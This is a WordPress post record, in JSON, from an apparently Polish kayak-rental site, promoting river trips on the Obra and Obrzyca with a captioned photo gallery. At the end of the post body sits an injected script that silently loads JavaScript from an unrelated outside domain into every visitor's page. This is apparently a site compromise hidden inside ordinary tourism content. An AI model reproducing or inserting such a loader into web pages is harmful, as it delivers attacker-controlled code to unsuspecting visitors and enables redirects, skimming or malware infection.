{"id":1,"date":"2026-01-02T21:14:39","date_gmt":"2026-01-02T19:14:39","guid":{"rendered":"http:\/\/www.kargus-kajaki.pl\/?p=1"},"modified":"2026-01-03T15:19:11","modified_gmt":"2026-01-03T13:19:11","slug":"witaj-swiecie","status":"publish","type":"post","link":"https:\/\/www.kargowa-kajaki.pl\/?p=1","title":{"rendered":"Witaj, wodniaku!"},"content":{"rendered":"<address>&nbsp;<\/address>\n<address>&nbsp;<\/address>\n<address><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2018\/12\/43.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-1009 alignnone\" title=\"43\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2018\/12\/43-1024x768.jpg\" alt=\"\" width=\"430\" height=\"323\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2018\/12\/43-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2018\/12\/43-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2018\/12\/43.jpg 1280w\" sizes=\"auto, (max-width: 430px) 100vw, 430px\" \/><\/a>Chcesz przyjemnie sp\u0119dzi\u0107&nbsp; wolny czas, jaki uda\u0142o Ci si\u0119 wygospodarowa\u0107 w \u017cyciowym kieracie?&nbsp; Wybierz si\u0119 na sp\u0142yw kajakowy. Troch\u0119 wysi\u0142ku, kontakt z przyrod\u0105 a po sp\u0142ywie zapach dymu z ogniska.<\/address>\n<address>Przyjed\u017a na wodniack\u0105 przygod\u0119 po lubuskich i wielkopolskich szlakach kajakowych, jeszcze wolnych od nat\u0142oku turyst\u00f3w. Obra, Obrzyca i ich dop\u0142ywy wabi\u0105 swoim niezaprzeczalnym urokiem, za ka\u017cdym razem innym&nbsp; w zale\u017cno\u015bci od pory dnia, stanu wody, pogody. Ta sama okolica ogl\u0105dana z okna samochodu czy z wysoko\u015bci burty kajaka to dwa inne \u015bwiaty.&nbsp; Spotkanie&nbsp; bobra, czapli, g\u0119si, \u017curawi i innych zwierz\u0105t znanych z atlas\u00f3w i telewizji to tu &#8222;normalka&#8221;.&nbsp; Czysta woda i go\u015bcinni ludzie to nasz atut. Warto tu by\u0107!<\/address>\n<address>&nbsp;<\/address>\n<address>&nbsp;<\/address>\n<p style=\"text-align: center;\">OBRA<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/DSCF7442.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-807\" title=\"pocz\u0105tek szlaku Obry - wp\u0142yw z rozlewisk na Jezioro Wielkowiejskie\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/DSCF7442-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/DSCF7442-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/DSCF7442-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/DSCF7442.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6154317.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-808\" title=\"pomnik Karola Wojty\u0142y (dzi\u015b \u015bw. Jana Paw\u0142a II) w Zb\u0105szyniu, przerwa obowi\u0105zkowa \" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6154317-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6154317-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6154317-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6154317.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9241986.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-809\" title=\"Obra za Mi\u0119dzyrzeczem ma &quot;pazur&quot;, mozna zaliczy\u0107 pi\u0119kn\u0105 &quot;kabin\u0119&quot;\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9241986-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9241986-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9241986-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9241986.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9242019.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-806\" title=\"na Obrze \u0142ab\u0119dzie czuj\u0105 si\u0119 jak &quot;u siebie&quot;\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9242019-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9242019-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9242019-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P9242019.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">&nbsp;OBRZYCA<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2012\/12\/P9171940.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-639\" title=\"pla\u017ca nad Obrzyc\u0105 w Kargowej, pole biwakowe, boisko do pi\u0142ki pla\u017cowej, wiaty turystyczne, miejsce na ognisko\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2012\/12\/P9171940-300x225.jpg\" alt=\"\" width=\"300\" height=\"206\"><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2009\/08\/Obrzyca-7.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-341\" title=\"czysta wodw w Obrzycy w okolicach Lubiatowa\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2009\/08\/Obrzyca-7-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2009\/08\/Obrzyca-7-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2009\/08\/Obrzyca-7.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8154803.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-797\" title=\"jaz w Usciu - szansa na odrobin\u0119 andrenaliny\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8154803-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8154803-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8154803-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8154803.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">PO\u0141UDNIOWY KANA\u0141 OBRY<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P7264506.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-792\" title=\"dziki odcinek kana\u0142u w okolicach Bagna\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P7264506-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P7264506-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P7264506-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P7264506.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">KONWALIOWY SZLAK KAJAKOWY<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/20140829_111518.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-786\" title=\"pocz\u0105tek Kana\u0142u Boszkowskiego za J.Dominickim - troch\u0119 brodzenie w czystej wodzie\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/20140829_111518-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/20140829_111518-300x180.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/20140829_111518-1024x614.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/20140829_111518.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174362.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-789\" title=\"malownicze  jeziora stanowi\u0105 wi\u0119ksz\u0105 cz\u0119\u015b\u0107 szlaku\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174362-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174362-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174362-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174362.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8284896.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-785\" title=\"s\u0142ynne jezioro Mia\u0142kie - ma\u0142o wody, du\u017co b\u0142ota\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8284896-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8284896-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8284896-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P8284896.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174335.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-788\" title=\"Jesioro Przem\u0119ckie Ma\u0142e r\u00f3wnie\u017c zamulone a w tle 2 wynios\u0142e wie\u017ce przem\u0119ckiego koscio\u0142a\" src=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174335-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174335-300x225.jpg 300w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174335-1024x768.jpg 1024w, https:\/\/www.kargowa-kajaki.pl\/wp-content\/uploads\/2014\/12\/P6174335.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; &nbsp; Chcesz przyjemnie sp\u0119dzi\u0107&nbsp; wolny czas, jaki uda\u0142o Ci si\u0119 wygospodarowa\u0107 w \u017cyciowym kieracie?&nbsp; Wybierz si\u0119 na sp\u0142yw kajakowy. Troch\u0119 wysi\u0142ku, kontakt z przyrod\u0105 a po sp\u0142ywie zapach dymu z ogniska. Przyjed\u017a na wodniack\u0105 przygod\u0119 po lubuskich i wielkopolskich szlakach kajakowych, jeszcze wolnych od nat\u0142oku turyst\u00f3w. Obra, Obrzyca i ich dop\u0142ywy wabi\u0105 swoim niezaprzeczalnym [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1","post","type-post","status-publish","format-standard","hentry","category-bez-kategorii"],"_links":{"self":[{"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=\/wp\/v2\/posts\/1","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1"}],"version-history":[{"count":101,"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=\/wp\/v2\/posts\/1\/revisions"}],"predecessor-version":[{"id":1150,"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=\/wp\/v2\/posts\/1\/revisions\/1150"}],"wp:attachment":[{"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kargowa-kajaki.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}